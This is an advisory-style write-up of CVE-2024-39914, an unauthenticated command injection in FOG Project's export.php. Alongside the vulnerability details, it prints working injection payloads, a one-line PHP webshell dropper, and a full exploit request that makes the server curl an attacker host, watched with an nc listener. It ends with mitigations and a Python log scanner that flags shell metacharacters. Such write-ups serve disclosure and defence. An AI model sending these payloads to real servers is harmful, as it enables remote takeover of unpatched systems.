
Jun 26, 2025
CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php
Discover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project ≤ 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.
CVE-2024-39914 is a critical unauthenticated command injection vulnerability in FOG Project version ≤ 1.5.10.34. The flaw exists in how the filename parameter is processed by export.php, allowing attackers to inject arbitrary system commands. This can be used for immediate command execution or to drop a persistent PHP webshell for follow-up exploitation.
- CVE ID: CVE-2024-39914
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 92.67%
- Affected Versions: ≤ 1.5.10.34
- Patched Version: 1.5.10.35
- Authentication Required: No
- Impact: Remote Command Execution
Technical Breakdown
The export.php script in the fog/management/ directory passes the filename parameter to a backend system command without sanitizing it, likely via shell_exec() or a similar execution function.
An attacker can inject system commands inside the filename parameter, for example:
filename=$(id)
This leads to immediate execution of id on the server. Additionally, attackers can write arbitrary content (e.g., a webshell) into a file on the server:
filename=$(echo '<?php echo shell_exec($_GET["cmd"]); ?>' > WEBSHELL)
The resulting file (WEBSHELL) can then be accessed remotely to execute further OS commands.
Conditions for Exploitation
- FOG server must be network accessible
- No login or session is required
- Web server user must have write access to the web directory
- PHP execution is enabled under /fog/management/
Exploitation Steps
To exploit this, inject a system command in the filename parameter to achieve unauthenticated RCE.
Step 1: Send Malicious POST Request
POST /fog/management/export.php?filename=$(curl+192.168.100.8)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

fogguiuser=fog&nojson=2
Step 2: Monitor the Attacker Server
On the attacking machine (e.g., 192.167.100.1), listen for incoming requests:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
Connection from 192.168.15.5:49802
GET / HTTP/1.1
Mitigation
- Upgrade to FOG Project 1.5.10.35 or later, where the input validation and shell execution logic have been corrected
- Restrict access to /fog/management/ from public networks
- Apply input validation and disallow shell execution from user-supplied parameters
- Use a WAF to detect command injection patterns ($(), ;, |, etc.)
- Disable PHP execution in upload/export directories if possible
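For the detection side of the mitigations above, the following added example (not OffSec's or FOG Project's code) scans web server access logs for requests to export.php whose decoded filename parameter contains shell metacharacters. It assumes combined-format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that have no place in an export file name:
# command substitution, backticks, separators, pipes, redirection, newlines.
SHELL_META = re.compile(r"\$\(|\$\{|`|[;|&<>\n\r]")
# Combined/common log format: client IP first, then "METHOD target HTTP/x.y"
REQUEST = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+"')


def suspicious_export_requests(log_lines):
    """Return (client_ip, decoded_filename) for each flagged export.php hit."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/management/export.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space, so
        # encoded variants (%24%28...) are inspected in decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("filename", []):
            if SHELL_META.search(value):
                hits.append((client, value))
    return hits


# Constructed sample lines (documentation addresses, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2025:10:00:01 +0000] '
    '"POST /fog/management/export.php?filename=hosts&type=pdf HTTP/1.1" 200 512',
    '192.0.2.66 - - [26/Jun/2025:10:00:07 +0000] '
    '"POST /fog/management/export.php?filename=$(id)&type=pdf HTTP/1.1" 200 0',
    '192.0.2.66 - - [26/Jun/2025:10:00:09 +0000] '
    '"POST /fog/management/export.php?filename=%24%28id%29&type=pdf HTTP/1.1" 200 0',
    '192.0.2.10 - - [26/Jun/2025:10:00:12 +0000] '
    '"GET /fog/management/index.php?node=home HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for client, value in suspicious_export_requests(SAMPLE_LOG):
        print(f"ALERT {client} filename={value!r}")
```

Access logs record only the request line, so a filename value sent in a POST body would need the same check applied at the WAF or reverse proxy.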